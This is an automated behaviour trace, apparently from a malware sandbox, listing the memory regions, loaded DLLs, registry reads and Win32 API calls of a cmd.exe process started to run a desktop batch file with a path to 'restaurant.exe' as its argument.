ExitProcess (uExitCode=0x1) Thread: id = 855 os_tid = 0x6e8 Process: id = "95" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x174a1000" os_pid = "0x974" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbd0" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\"\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7024 start_va = 0xe40000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 7025 start_va = 0xe60000 end_va = 0xe61fff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 7026 start_va = 0xe70000 end_va = 0xe83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e70000" filename = "" Region: id = 7027 start_va = 0xe90000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 7028 start_va = 0xed0000 end_va = 0xfcffff entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 7029 start_va = 0xfd0000 end_va = 0xfd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fd0000" filename = "" Region: id = 7030 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 7031 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 7032 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7033 start_va = 0x7f830000 end_va = 0x7f852fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f830000" filename = "" Region: id = 7034 start_va = 0x7f85b000 end_va = 0x7f85dfff entry_point = 0x0 region_type = private name = "private_0x000000007f85b000" filename = "" Region: id = 7035 start_va = 0x7f85e000 end_va = 0x7f85efff entry_point = 0x0 region_type = private name = "private_0x000000007f85e000" filename = "" Region: id = 7036 start_va = 0x7f85f000 end_va = 0x7f85ffff entry_point = 0x0 region_type = private name = "private_0x000000007f85f000" filename = "" Region: id = 7037 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7038 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7039 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 7040 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7041 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 7042 start_va = 0xfe0000 end_va = 0xfe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fe0000" filename = "" Region: id = 7043 start_va = 0xff0000 end_va = 0xff1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 7119 start_va = 0x1150000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 7120 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7121 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7122 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7123 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7124 start_va = 0x1160000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 7125 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7126 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7127 start_va = 0xe40000 end_va = 0xe4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e40000" filename = "" Region: id = 7128 start_va = 0x7f730000 end_va = 0x7f82ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f730000" filename = "" Region: id = 7450 start_va = 0x1000000 end_va = 0x10bdfff entry_point = 0x1000000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7451 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7452 start_va = 0x10c0000 end_va = 0x10fffff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 7453 start_va = 0x1160000 end_va = 0x125ffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 7454 start_va = 0x1270000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 7455 start_va = 0x5420000 end_va = 0x559ffff entry_point = 0x0 region_type = private name = "private_0x0000000005420000" filename = "" Region: id = 7456 start_va = 0x7f858000 end_va = 0x7f85afff entry_point = 0x0 region_type = private name = "private_0x000000007f858000" filename = "" Region: id = 7457 start_va = 0xe50000 end_va = 0xe53fff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 7734 start_va = 0xe60000 end_va = 0xe63fff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 7785 start_va = 0x74540000 end_va = 0x74547fff entry_point = 0x74540000 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 7786 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7787 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7788 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7789 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7790 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7791 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7792 start_va = 0x1100000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 8059 start_va = 0x55a0000 end_va = 0x58d6fff entry_point = 0x55a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 861 os_tid = 0x760 [0273.385] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0273.385] __set_app_type (_Type=0x1) [0273.385] __p__fmode () returned 0x77984d6c [0273.385] __p__commode () returned 0x77985b1c [0273.385] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0273.385] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0273.385] GetCurrentThreadId () returned 0x760 [0273.385] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x760) returned 0x84 [0273.385] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0273.385] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0273.385] SetThreadUILanguage (LangId=0x0) returned 0x409 [0273.501] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0273.501] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xfcfb90 | out: phkResult=0xfcfb90*=0x0) returned 0x2 [0273.501] VirtualQuery (in: lpAddress=0xfcfb97, lpBuffer=0xfcfb48, dwLength=0x1c | out: lpBuffer=0xfcfb48*(BaseAddress=0xfcf000, AllocationBase=0xed0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0273.501] VirtualQuery (in: lpAddress=0xed0000, lpBuffer=0xfcfb48, dwLength=0x1c | out: lpBuffer=0xfcfb48*(BaseAddress=0xed0000, AllocationBase=0xed0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0273.501] VirtualQuery (in: lpAddress=0xed1000, lpBuffer=0xfcfb48, dwLength=0x1c | out: lpBuffer=0xfcfb48*(BaseAddress=0xed1000, AllocationBase=0xed0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0273.501] VirtualQuery (in: lpAddress=0xed3000, lpBuffer=0xfcfb48, dwLength=0x1c | out: lpBuffer=0xfcfb48*(BaseAddress=0xed3000, AllocationBase=0xed0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0273.501] VirtualQuery (in: lpAddress=0xfd0000, lpBuffer=0xfcfb48, dwLength=0x1c | out: lpBuffer=0xfcfb48*(BaseAddress=0xfd0000, AllocationBase=0xfd0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0273.501] GetConsoleOutputCP () returned 0x1b5 [0273.597] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0273.597] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0273.597] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.597] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0273.751] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.751] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0275.454] _get_osfhandle (_FileHandle=1) returned 0x3c [0275.454] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0275.621] _get_osfhandle (_FileHandle=0) returned 0x38 [0275.621] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0275.639] _get_osfhandle (_FileHandle=0) returned 0x38 [0275.639] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0276.457] GetEnvironmentStringsW () returned 0x1277eb0* [0276.457] FreeEnvironmentStringsA (penv="A") returned 1 [0276.457] GetEnvironmentStringsW () returned 0x1277eb0* [0276.457] FreeEnvironmentStringsA (penv="A") returned 1 [0276.457] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xfceaf4 | out: phkResult=0xfceaf4*=0x94) returned 0x0 [0276.457] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xfceaf8, lpData=0xfceb00, lpcbData=0xfceafc*=0x1000 | out: lpType=0xfceaf8*=0x0, lpData=0xfceb00*=0x0, lpcbData=0xfceafc*=0x1000) returned 0x2 [0276.457] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xfceaf8, lpData=0xfceb00, lpcbData=0xfceafc*=0x1000 | out: lpType=0xfceaf8*=0x4, lpData=0xfceb00*=0x1, lpcbData=0xfceafc*=0x4) returned 0x0 [0276.457] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xfceaf8, lpData=0xfceb00, lpcbData=0xfceafc*=0x1000 | out: lpType=0xfceaf8*=0x0, lpData=0xfceb00*=0x1, lpcbData=0xfceafc*=0x1000) returned 0x2 [0276.457] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xfceaf8, lpData=0xfceb00, lpcbData=0xfceafc*=0x1000 | out: lpType=0xfceaf8*=0x4, lpData=0xfceb00*=0x0, lpcbData=0xfceafc*=0x4) returned 0x0 [0276.457] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xfceaf8, lpData=0xfceb00, lpcbData=0xfceafc*=0x1000 | out: lpType=0xfceaf8*=0x4, lpData=0xfceb00*=0x40, lpcbData=0xfceafc*=0x4) returned 0x0 [0276.457] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xfceaf8, lpData=0xfceb00, lpcbData=0xfceafc*=0x1000 | out: lpType=0xfceaf8*=0x4, lpData=0xfceb00*=0x40, lpcbData=0xfceafc*=0x4) returned 0x0 [0276.457] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xfceaf8, lpData=0xfceb00, lpcbData=0xfceafc*=0x1000 | out: lpType=0xfceaf8*=0x0, lpData=0xfceb00*=0x40, lpcbData=0xfceafc*=0x1000) returned 0x2 [0276.458] RegCloseKey (hKey=0x94) returned 0x0 [0276.458] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xfceaf4 | out: phkResult=0xfceaf4*=0x94) returned 0x0 [0276.458] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xfceaf8, lpData=0xfceb00, lpcbData=0xfceafc*=0x1000 | out: lpType=0xfceaf8*=0x0, lpData=0xfceb00*=0x40, lpcbData=0xfceafc*=0x1000) returned 0x2 [0276.458] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xfceaf8, lpData=0xfceb00, lpcbData=0xfceafc*=0x1000 | out: lpType=0xfceaf8*=0x4, lpData=0xfceb00*=0x1, lpcbData=0xfceafc*=0x4) returned 0x0 [0276.458] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xfceaf8, lpData=0xfceb00, lpcbData=0xfceafc*=0x1000 | out: lpType=0xfceaf8*=0x0, lpData=0xfceb00*=0x1, lpcbData=0xfceafc*=0x1000) returned 0x2 [0276.458] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xfceaf8, lpData=0xfceb00, lpcbData=0xfceafc*=0x1000 | out: lpType=0xfceaf8*=0x4, lpData=0xfceb00*=0x0, lpcbData=0xfceafc*=0x4) returned 0x0 [0276.458] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xfceaf8, lpData=0xfceb00, lpcbData=0xfceafc*=0x1000 | out: lpType=0xfceaf8*=0x4, lpData=0xfceb00*=0x9, lpcbData=0xfceafc*=0x4) returned 0x0 [0276.458] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xfceaf8, lpData=0xfceb00, lpcbData=0xfceafc*=0x1000 | out: lpType=0xfceaf8*=0x4, lpData=0xfceb00*=0x9, lpcbData=0xfceafc*=0x4) returned 0x0 [0276.458] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xfceaf8, lpData=0xfceb00, lpcbData=0xfceafc*=0x1000 | out: lpType=0xfceaf8*=0x0, lpData=0xfceb00*=0x9, lpcbData=0xfceafc*=0x1000) returned 0x2 [0276.458] RegCloseKey (hKey=0x94) returned 0x0 [0276.458] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb4329d [0276.458] srand (_Seed=0x5bb4329d) [0276.458] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\"\"" [0276.458] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\"\"" [0276.458] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0276.458] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1277eb8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0276.458] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0276.458] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0276.458] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0276.458] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0276.458] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0276.458] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0276.458] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0276.458] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0276.458] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0276.459] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0276.459] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0276.459] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0276.459] GetEnvironmentStringsW () returned 0x12780c8* [0276.459] FreeEnvironmentStringsA (penv="A") returned 1 [0276.459] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0276.459] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0276.459] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0276.459] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0276.459] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0276.459] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0276.459] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0276.459] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0276.459] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0276.459] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0276.459] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xfcf8cc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0276.459] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0xfcf8cc, lpFilePart=0xfcf8c4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xfcf8c4*="Desktop") returned 0x1d [0276.459] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0276.460] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xfcf648 | out: lpFindFileData=0xfcf648) returned 0x12705c8 [0276.460] FindClose (in: hFindFile=0x12705c8 | out: hFindFile=0x12705c8) returned 1 [0276.460] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xfcf648 | out: lpFindFileData=0xfcf648) returned 0x12705c8 [0276.460] FindClose (in: hFindFile=0x12705c8 | out: hFindFile=0x12705c8) returned 1 [0276.460] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0276.460] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xfcf648 | out: lpFindFileData=0xfcf648) returned 0x12705c8 [0276.460] FindClose (in: hFindFile=0x12705c8 | out: hFindFile=0x12705c8) returned 1 [0276.460] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0276.460] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0276.460] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0276.460] GetEnvironmentStringsW () returned 0x12780c8* [0276.460] FreeEnvironmentStringsA (penv="=") returned 1 [0276.460] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0276.461] GetConsoleOutputCP () returned 0x1b5 [0277.051] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0277.051] GetUserDefaultLCID () returned 0x409 [0277.051] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0277.051] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xfcf9fc, cchData=128 | out: lpLCData="0") returned 2 [0277.051] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xfcf9fc, cchData=128 | out: lpLCData="0") returned 2 [0277.051] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xfcf9fc, cchData=128 | out: lpLCData="1") returned 2 [0277.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0277.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0277.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0277.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0277.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0277.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0277.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0277.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0277.052] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0277.052] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0277.052] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0277.053] GetConsoleTitleW (in: lpConsoleTitle=0x127a9b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0277.627] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0277.627] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0277.627] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0277.627] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0277.628] _wcsicmp (_String1="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"", _String2=")") returned -7 [0277.628] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0277.628] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0277.628] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0277.628] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0277.628] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0277.628] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0277.630] GetConsoleTitleW (in: lpConsoleTitle=0xfcf6e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0277.630] GetFileAttributesW (lpFileName="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\\"c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat\"")) returned 0xffffffff [0277.630] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0277.630] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0277.630] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0277.630] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0277.630] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0277.630] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0277.630] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0277.630] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 